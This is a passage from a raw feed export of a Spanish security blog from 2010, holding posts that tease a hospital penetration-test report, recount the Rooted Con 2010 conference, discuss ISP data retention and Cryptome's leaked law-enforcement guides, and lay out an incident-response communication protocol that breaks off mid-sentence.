type='html'>Hola lectores,&lt;br /&gt;&lt;br /&gt;Hace un tiempo hemos realizado una revisión de seguridad en un famoso hospital privado. Los resultados han sido sorprendentes y alucinantes por la forma como lo hemos realizado.&lt;br /&gt;&lt;br /&gt;Las  conclusiones son espectaculares. Hemos conseguido:&lt;br /&gt;&lt;br /&gt;- Ingeniería  social: contraseñas, acceso a sitios para personal autorizado, ...(esta fué la parte más divertida)&lt;br /&gt;- Seguridad física: acceso al CPD, robo de discos duros con backups,  tarjetas RFID, ...&lt;br /&gt;- Fuga de información: expedientes médicos, bases  de datos de pacientes,procedimientos de backup, ...&lt;br /&gt;- Control total de los PCs de los  administradores y de la DMZ, control del software del propio hospital...&lt;br /&gt;&lt;br /&gt;Publicaremos los resultados  paralelamente aquí y en el blog de&lt;a href="http://hacking-avanzado.blogspot.com/"&gt; &lt;span style="color: #3d85c6;"&gt;Eduardo Abril&lt;/span&gt;&lt;/a&gt;&lt;span style="color: #3d85c6;"&gt;.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;¡¡Así que estaros atentos !!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-3512345829821337510?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/3512345829821337510/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=3512345829821337510' title='3 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/3512345829821337510'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/3512345829821337510'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2010/03/estaros-atentos.html' title='Estaros atentos!!!'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-8415098483951304719</id><published>2010-03-22T10:47:00.000+01:00</published><updated>2010-03-22T10:47:52.139+01:00</updated><title type='text'>¡¡ Gracias a todos !!</title><content type='html'>&lt;b&gt;Se acabo la Rooted Con 2010.&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Han sido unos días increibles, con un nivel técnico alucinante, una organización a la altura de los grandes eventos internacionales y que nada tiene que envidiar.&lt;br /&gt;&lt;br /&gt;Las fiestas, las cervezas consumidas y demás networking de pasillo ha sido de lo más gratificante, hemos compartido, puesto cara a los nicks y como no algún que otro intercambio de conocimientos.&lt;br /&gt;&lt;br /&gt;Hemos aprendido muchísimo e incluso se me ha quedado corto el magnifico evento&lt;br /&gt;&lt;br /&gt;Gracias a la organización y a todos aquellos que estuvisteis en mi charla, fué muy gratificante estar con todos vosotros.&lt;br /&gt;&lt;br /&gt;Tuve la suerte de que la cadena de TV cuatro me hiciera una mini entrevista, que esta pendiente de salir. Por otro lado también salgo (de refilón) en Antena3 y en otro reportaje de la cuatro, (pronto saldré en Hola y en Salvame de Luxe).&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Cobertura sobre el evento:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;http://www.cuatro.com/noticias/videos/piratas-informaticos-dan-cara/20100319ctoultpro_12/&lt;br /&gt;&lt;br /&gt;http://www.antena3noticias.com/PortalA3N/ciencia-y-tecnologia/Las-grandes-empresas-contratan-hackers-para-protegerse/10220625&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-8415098483951304719?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/8415098483951304719/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=8415098483951304719' title='4 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/8415098483951304719'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/8415098483951304719'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2010/03/gracias-todos.html' title='¡¡ Gracias a todos !!'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-8936672869172299542</id><published>2010-03-18T08:08:00.000+01:00</published><updated>2010-03-18T08:08:58.230+01:00</updated><title type='text'>Empieza la Rooted Con 2010</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;a href="http://2.bp.blogspot.com/_7dOLVYBL8vA/S6HRTi3MgzI/AAAAAAAABmA/8tZdg-210Ck/s1600-h/Capturam.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="98" src="http://2.bp.blogspot.com/_7dOLVYBL8vA/S6HRTi3MgzI/AAAAAAAABmA/8tZdg-210Ck/s200/Capturam.PNG" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;Hola lectores,&lt;br /&gt;&lt;br /&gt;Hoy comienza la primera edición del congreso de seguridad &lt;a href="http://www.rootedcon.es/rooted-con-2010/horario.html"&gt;Rooted Con&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Más o menos sobre la 13:00 de la tarde impartiré una conferencia sobre 'autopsia de una intrusión'.&lt;br /&gt;&lt;br /&gt;Podréis seguir toda la información referente al congreso mediante el &lt;i&gt;hashtag  &lt;/i&gt;de &lt;i&gt;twitter &lt;/i&gt;&lt;a href=""&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;i&gt;&lt;a href="http://search.twitter.com/search?q=%23rooted2010"&gt;#rooted2010&lt;/a&gt; &lt;/i&gt;&lt;/b&gt;especialmente  creado para esta Rooted CON 2010.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;i&gt;&lt;span class="Apple-style-span" style="font-weight: normal;"&gt;&lt;span class="Apple-style-span" style="font-style: normal;"&gt;¡¡ Nos vemos !! &lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-8936672869172299542?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/8936672869172299542/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=8936672869172299542' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/8936672869172299542'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/8936672869172299542'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2010/03/empieza-la-rooted-con-2010.html' title='Empieza la Rooted Con 2010'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_7dOLVYBL8vA/S6HRTi3MgzI/AAAAAAAABmA/8tZdg-210Ck/s72-c/Capturam.PNG' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-2269980447372176099</id><published>2010-03-02T17:32:00.000+01:00</published><updated>2010-03-02T17:32:03.294+01:00</updated><title type='text'>Todo se guarda...</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;a href="http://3.bp.blogspot.com/_7dOLVYBL8vA/S408-_bYLnI/AAAAAAAABlw/bZBnHtrXazQ/s1600-h/Captura.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="96" src="http://3.bp.blogspot.com/_7dOLVYBL8vA/S408-_bYLnI/AAAAAAAABlw/bZBnHtrXazQ/s320/Captura.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;Hola lectores,&lt;br /&gt;&lt;br /&gt;En una conferencia en Palma de Mallorca me preguntarón si las fuerzas del estado (en España) monitorizaban tipo SITEL las conversaciones telemáticas del tipo correos electrónicos, chats, foros, etc.&lt;br /&gt;&lt;br /&gt;Ni que decir tiene &lt;b&gt;que NO&lt;/b&gt;. Esa información por ley Española&amp;nbsp; la suelen guardar las operadoras o proveedores de servicio, que tras orden judicial proporcionan la información a las fuerzas del estado que lo requieran.&lt;br /&gt;&lt;br /&gt;No obstante en otros países como Alemanía, los servicios secretos de este país, hasta ahora podían seguir grabando conversaciones privadas o conexiones de Internet y almacenándolas durante meses sin permiso previo de un juez, como venían haciendo hasta ahora en aras de la seguridad nacional. No obstante el constitucional de este país ha prohibido tajantemente la grabación o almacenamiento de esta información privada.&lt;br /&gt;&lt;br /&gt;El caso es que todo o casi todos los datos que circulan por la red son almacenados en algún momento por las operadoras de servicios o empresas. Estas pueden proporcionar un 'framework' de acceso vía web o webservices para que sean las propias fuerzas policiales quienes exploten está u otra información que venga avalada por orden judicial.&lt;br /&gt;&lt;br /&gt;La cuestión (ya planteada y exigida anteriormente por la AEPD) es que no queda claro el concepto de retención de datos ni la política de estas operadoras o empresas de servicios, tampoco que es lo que se guarda. Por otro lado la web Cryptome publicaba una especie de manual, en la que describen cómo Microsoft guarda datos privados de los usuarios que acceden a servicios 'online' como MSN Messenger, Windows Live y Xbox Live, y cómo esos datos se ponen a disposición de las autoridades de EEUU cuando son requeridos.&lt;br /&gt;&lt;br /&gt;Esto no hizo mucha gracia a Microsoft y puso una demanda (hoy desestimada) para el cierre cautelar del sitio web Cryptome (&lt;a href="http://www.elmundo.es/elmundo/2010/02/26/navegante/1267185615.html" style="color: #0b5394;"&gt;ver noticia&lt;/a&gt;)&lt;br /&gt;&lt;br /&gt;&lt;a href="http://cryptome.org/"&gt;&lt;span style="color: #0b5394;"&gt;Cryptome&lt;/span&gt; &lt;/a&gt;es una web que dispone de documentos que esta prohibidos por los gobiernos de todo el mundo, en particular el material de la libertad de expresión, la privacidad, la criptografía, las tecnologías de doble uso, la seguridad nacional, inteligencia, y el gobierno secreto.&lt;br /&gt;&lt;br /&gt;Aquí dejo algunos documentos que me han parecido interesantes desde el punto de vista forense o técnico y que cada uno saque sus propias conclusiones.&lt;br /&gt;&lt;br /&gt;Documento de la discordia:&amp;nbsp; &lt;a href="http://cryptome.org//isp-spy/microsoft-spy.zip" style="color: #0b5394;"&gt;microsoft-spy.zip&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Documentos sobre Windows 7 relativos a privacidad&lt;br /&gt;&lt;pre&gt;&lt;b&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/b&gt;&lt;/pre&gt;&lt;pre&gt;&lt;b&gt;&lt;b&gt;&lt;a href="http://cryptome.org/isp-spy/win7-spy.zip"&gt;http://cryptome.org/isp-spy/win7-spy.zip&lt;/a&gt;&lt;/b&gt;&lt;/b&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;Otros documentos:&lt;br /&gt;&lt;br /&gt;&lt;div style="color: #0b5394;"&gt;&lt;a href="http://cryptome.org/isp-spy/facebook-spy.pdf"&gt;facebook-spy.pdf&lt;/a&gt;&lt;/div&gt;&lt;pre&gt;&lt;b&gt;&lt;b&gt;&lt;a href="http://cryptome.org/isp-spy/skype-spy.pdf"&gt;skype-spy.pdf&lt;/a&gt;&amp;nbsp;&lt;/b&gt;&lt;/b&gt;&lt;/pre&gt;&lt;pre&gt;&lt;b&gt;&lt;b&gt;&lt;a href="http://cryptome.org/isp-spy/yahoo-preserve.pdf"&gt;yahoo-preserve.pdf&lt;/a&gt; &lt;/b&gt;&lt;/b&gt;&lt;b&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/b&gt;&lt;/pre&gt;&lt;div style="color: #0b5394;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-2269980447372176099?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/2269980447372176099/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=2269980447372176099' title='2 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/2269980447372176099'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/2269980447372176099'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2010/03/todo-se-guarda.html' title='Todo se guarda...'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_7dOLVYBL8vA/S408-_bYLnI/AAAAAAAABlw/bZBnHtrXazQ/s72-c/Captura.JPG' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-6669705851324472118</id><published>2010-02-17T11:32:00.012+01:00</published><updated>2010-02-17T11:39:00.804+01:00</updated><title type='text'>Protocolo de respuesta ante incidentes</title><content type='html'>Hola lectores,&lt;br /&gt;&lt;br /&gt;Hoy vamos a tratar los temas relacionados con la respuesta ante incidentes. Tema muy importante dentro de una organización.&lt;br /&gt;&lt;br /&gt;En nuestro día a día es mejor prevenir que curar, y la seguridad no es una excepción. Cuando se produce un incidente de seguridad, se debe garantizar que se minimice su repercusión. Para minimizar la cantidad y repercusión de los incidentes de seguridad, debe seguir estas pautas:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Establecer claramente y poner en práctica todas las  directivas y procedimientos. Las directivas y los procedimientos se  deben probar exhaustivamente para garantizar que son prácticos y  claros, y que ofrecen el nivel de seguridad apropiado.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Evaluar de forma regular las vulnerabilidades del entorno.  Las evaluaciones deben ser realizadas por un experto en seguridad  con la autoridad necesaria (con derechos de administrador de los  sistemas) para llevar a cabo estas acciones.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Establecer programas de formación sobre la seguridad tanto  para el personal de TI como para los usuarios finales.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Se deben enviar mensajes. Carteles de seguridad que recuerden  a los usuarios sus responsabilidades y restricciones, junto con la  advertencia de que se pueden emprender acciones legales en caso de  infracción.   &lt;br /&gt;&lt;/li&gt;&lt;li&gt;Comprobar con regularidad todos los registros y mecanismos de  registro. Cortafuegos, IDS's, etc.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Comprobar los procedimientos de restauración y copia de  seguridad.   &lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;Particularmente he realizado un procedimiento de comunicación que nos puede ser útil para estos casos, va por ustedes:&lt;br /&gt;&lt;br /&gt;&lt;b&gt;PROTOCOLO DE COMUNICACION&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Cuando un problema o incidencia en las instalaciones, medios técnicos o recursos humanos tenga como consecuencia previsible no poder prestar alguno o todos los servicios encomendados se entrará en situación de &lt;b&gt;EMERGENCIA&lt;/b&gt;.  &lt;br /&gt;&lt;h3 style="color: #0b5394;"&gt;Niveles de emergencia  &lt;/h3&gt;&lt;br /&gt;Para establecer los protocolos de actuación se definen los siguientes Niveles de emergencia:&lt;br /&gt;&lt;br /&gt;&lt;table border="1" cellpadding="2" cellspacing="3"&gt;&lt;col width="31*"&gt;&lt;/col&gt;  &lt;col width="140*"&gt;&lt;/col&gt;  &lt;col width="85*"&gt;&lt;/col&gt;  &lt;thead&gt;&lt;tr&gt;    &lt;th width="12%"&gt;Nivel&lt;/th&gt;    &lt;th width="55%"&gt;Descripción&lt;/th&gt;    &lt;th width="33%"&gt;Ejemplos&lt;/th&gt;   &lt;/tr&gt;&lt;/thead&gt;  &lt;tbody&gt;&lt;tr valign="TOP"&gt;    &lt;td width="12%"&gt;&lt;div align="LEFT"&gt;&amp;nbsp;0 (Prealerta)&lt;/div&gt;&lt;/td&gt;    &lt;td width="55%"&gt;Detectada la incidencia pero se prevé su resolución     en un periodo inferior a 15 minutos o no afecta de     manera importante a los servicios prestados&lt;/td&gt;    &lt;td width="33%"&gt;&lt;br /&gt;&lt;/td&gt;   &lt;/tr&gt;&lt;tr&gt;    &lt;td width="12%"&gt;&lt;div align="LEFT"&gt;1 (Básica)&lt;/div&gt;&lt;/td&gt;    &lt;td width="55%"&gt;Fallo en las instalaciones o sistemas informáticos que     dificultan de manera importante o impiden la prestación de     algunos servicios      &lt;/td&gt;    &lt;td width="33%"&gt;&amp;nbsp;Pérdida de la conexión a internet, Fallo de algún     aplicativo,...      &lt;/td&gt;   &lt;/tr&gt;&lt;tr&gt;    &lt;td width="12%"&gt;&lt;div align="LEFT"&gt;&amp;nbsp;2 (General)&lt;/div&gt;&lt;/td&gt;    &lt;td width="55%"&gt;Fallos en las instalaciones o sistemas informáticos que     impiden la prestación de la mayoría de los servicios&lt;/td&gt;    &lt;td width="33%"&gt;Caídas de centralita, caídas de corriente eléctrica,     pérdida de las comunicaciones , intrusiones&lt;/td&gt;   &lt;/tr&gt;&lt;tr&gt;    &lt;td width="12%"&gt;&lt;div align="LEFT"&gt;&amp;nbsp;3 (Crítico)&lt;/div&gt;&lt;/td&gt;    &lt;td width="55%"&gt;&amp;nbsp;Situaciones que exigen al abandono del puesto de trabajo     por razones de seguridad&lt;/td&gt;    &lt;td width="33%"&gt;&amp;nbsp;Incendio, emergencias generales del edificio, ...&lt;/td&gt;   &lt;/tr&gt;&lt;/tbody&gt; &lt;/table&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="page-break-before: always;"&gt;La valoración del nivel de emergencia en el que se encuentra el departamento de TI y, por tanto, el protocolo de actuación a aplicar será determinado por el Responsable de TI o del Call Center cuando estén presentes en el centro de trabajo ó por el operador que detecte la incidencia, si no se encuentra en el Centro ninguno de los responsables (en adelante, a esta persona la denominaremos COORDINADOR DE LA EMERGENCIA).&lt;/div&gt;&lt;h3 style="color: #0b5394;"&gt;Protocolos de actuación  &lt;/h3&gt;Las acciones a realizar en un supuesto de emergencia son las siguientes:&lt;br /&gt;&lt;br /&gt;&lt;ol&gt;&lt;li&gt;Identificación del problema y  gestión de su resolución&lt;/li&gt;&lt;li&gt;Comunicación a la Dirección de  la empresa&lt;/li&gt;&lt;li&gt;Comunicación a Usuarios  &lt;/li&gt;&lt;li&gt;Registro y documentación de la incidencia&lt;/li&gt;&lt;/ol&gt;&lt;br /&gt;&lt;h4&gt;Identificación del problema y gestión de su resolución (Niveles 0,1,2,3)  &lt;/h4&gt;Para analizar el nivel de emergencia en el que se encuentra el departamento de TI y la celeridad con la que se deben iniciar las diferentes acciones de este protocolo de actuación, el COORDINADOR DE LA EMERGENCIA deberá evaluar los siguientes aspectos del problema:&lt;br /&gt;&lt;br /&gt;&lt;ol&gt;&lt;li&gt;Instalaciones y medios técnicos  afectadosServicios comprometidos   &lt;/li&gt;&lt;li&gt;Duración previsible de resolución&lt;/li&gt;&lt;/ol&gt;&lt;br /&gt;En el caso de que estemos en situación &lt;b&gt;Crítica (Nivel 3)&lt;/b&gt;, deberá proceder a notificar la incidencia al 112 y seguir las instrucciones, en la medida de lo posible, procederá al apagado ordenado de los equipos de trabajo, siempre y cuando esto no comprometa la seguridad de los trabajadores.&lt;br /&gt;En el &lt;b&gt;resto de los niveles de emergencia&lt;/b&gt;, se procederá a informar del problema al personal encargado para su resolución:&lt;br /&gt;&lt;br /&gt;&lt;ol&gt;&lt;li&gt;Problemas con las instalaciones  (electricidad, climatización, ...)&lt;/li&gt;&lt;li&gt;Medios técnicos (centralita,  comunicaciones, ordenadores,...)&lt;/li&gt;&lt;li&gt;Personal (accidentes, enfermedad)&lt;/li&gt;&lt;/ol&gt;&lt;br /&gt;El COORDINADOR DE LA EMERGENCIA se encargará de comprobar que los incidencia es resuelta y los servicios se vuelven a prestar con normalidad.&lt;br /&gt;&lt;h4&gt;Comunicación a la Dirección  &lt;/h4&gt;La cadena de mando es la siguiente:&lt;br /&gt;&lt;br /&gt;&lt;ol&gt;&lt;li&gt;Responsable del servicio de  emergencias&lt;/li&gt;&lt;li&gt;Director de Recursos Humanos&lt;/li&gt;&lt;li&gt;Director General   &lt;/li&gt;&lt;/ol&gt;&lt;br /&gt;Dependiendo del nivel de emergencia, el COORDINADOR DE LA EMERGENCIA deberá actuar de la siguiente
